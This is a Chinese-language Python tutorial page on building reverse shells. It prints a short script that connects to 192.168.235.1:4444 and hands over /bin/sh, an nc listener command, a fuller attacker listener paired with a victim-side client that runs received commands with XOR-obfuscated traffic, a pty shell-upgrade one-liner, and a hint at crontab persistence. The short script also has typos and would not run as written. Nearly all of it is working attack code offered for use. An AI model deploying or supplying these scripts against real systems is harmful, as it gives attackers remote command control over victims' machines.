Python教程
python反弹shell
本文主要是介绍python反弹shell,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
/etc/crontab设置定期执行的任务,修改需要root权限
简易版
python反弹shell的文件:
1 #!/usr/bin/python 2 import os,subprocess,socket 3 4 s=socket.socket(socket.AF_INET,socket,SOCK_STREAM) 5 s.connect((192.168.235.1,4444)) 6 os.dup2(s.fileno(),0) 7 os.dup2(s.fileno(),1) 8 os.dup2(s.fileno(),2) 9 p=subprocess.call(["/bin/sh","-i"])
攻击机使用监听命令: nc -vlp 4444
完整版
攻击机(监听端口444得到shell)执行的文件:
1 #!/usr/bin/env python3
2 # -*- coding:utf-8 -*-
3 # Author:Ameng, jlx-love.com
4
5 from socket import *
6 import struct
7
8
9 client = socket(AF_INET,SOCK_STREAM)
10 client.bind(('0.0.0.0',4444))
11 client.listen(5)
12 print('[+]Listening on port 4444...')
13 (conn,(ip,port)) = client.accept()
14 print('connect successfully to',ip)
15
16 def encrypt(data):
17 data = bytearray(data)
18 for i in range(len(data)):
19 data[i] ^= 0x23
20 return data
21
22
23 def decrypt(data):
24 data = bytearray(data)
25 for i in range(len(data)):
26 data[i] ^= 0x23
27 return data
28
29
30 while True:
31 cmd = input('~$ ').strip()
32 if len(cmd) == 0:
33 continue
34 cmd = encrypt(cmd.encode('utf-8'))
35 conn.send(cmd)
36 header = conn.recv(4)
37 total_size = struct.unpack('i',header)[0]
38 recv_size = 0
39 while recv_size < total_size:
40 recv_data = conn.recv(1024)
41 recv_size += len(recv_data)
42 recv_data = decrypt(recv_data)
43 print(recv_data.decode('utf-8'),end='')
靶机(被拿到shell)执行的文件:
1 #!/usr/bin/env python3
2 # -*- coding:utf-8 -*-
3 # Author:Ameng, jlx-love.com
4
5 from socket import *
6 import subprocess
7 import struct
8
9
10
11 server = socket(AF_INET,SOCK_STREAM)
12 server.connect(('192.168.235.1',4444))
13
14 def encrypt(data):
15 data = bytearray(data)
16 for i in range(len(data)):
17 data[i] ^= 0x23
18 return data
19
20
21 def decrypt(data):
22 data = bytearray(data)
23 for i in range(len(data)):
24 data[i] ^= 0x23
25 return data
26
27
28 while True:
29 try:
30 cmd = server.recv(1024)
31 cmd = decrypt(cmd)
32 if len(cmd) == 0:
33 break
34 res = subprocess.Popen(cmd.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
35 stdout_res = res.stdout.read()
36 stderr_res = res.stderr.read()
37 result = stdout_res + stderr_res
38 result = encrypt(result)
39 total_size = len(result)
40 header = struct.pack('i',total_size)
41 server.send(header)
42 server.send(result)
43 except Exception:
44 break
45 server.close()
注:在靶机运行py文件时才能在攻击机执行命令,当停止运行则shell环境结束
得到shell的命令行优化指令:
python -c "import pty;pty.spawn('/bin/bash')"
这篇关于python反弹shell的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
装anaconda默认下载路径在d盘,现在想用ipython的时候用不了了咋办?07-27
-
使用 Elasticsearch Python SDK 查询 Easysearch07-21
-
【Python】公众号聚合登录软件+源码07-18
-
开发一个python工具,pdf转图片,并且截成单个图片,然后修整没用的白边及循环遍历文件夹全量压缩图片07-15
-
为什么浏览器看status_code是200 但是python里的response.status_code返回是302-icode9专业技术文章分享07-11
-
有遇到过吗?同样的规则 Excel 中 比Python 结果大05-08
-
开始python成长之路03-30
-
python optparse03-29
-
python map 函数03-29
-
invalid format specifier python03-20
-
pool.map python03-18
-
threads in python03-18
-
python Ai 应用开发基础训练,字符串,字典,文件03-14
-
id3 algorithm python03-13
-
sum array elements python03-13
栏目导航
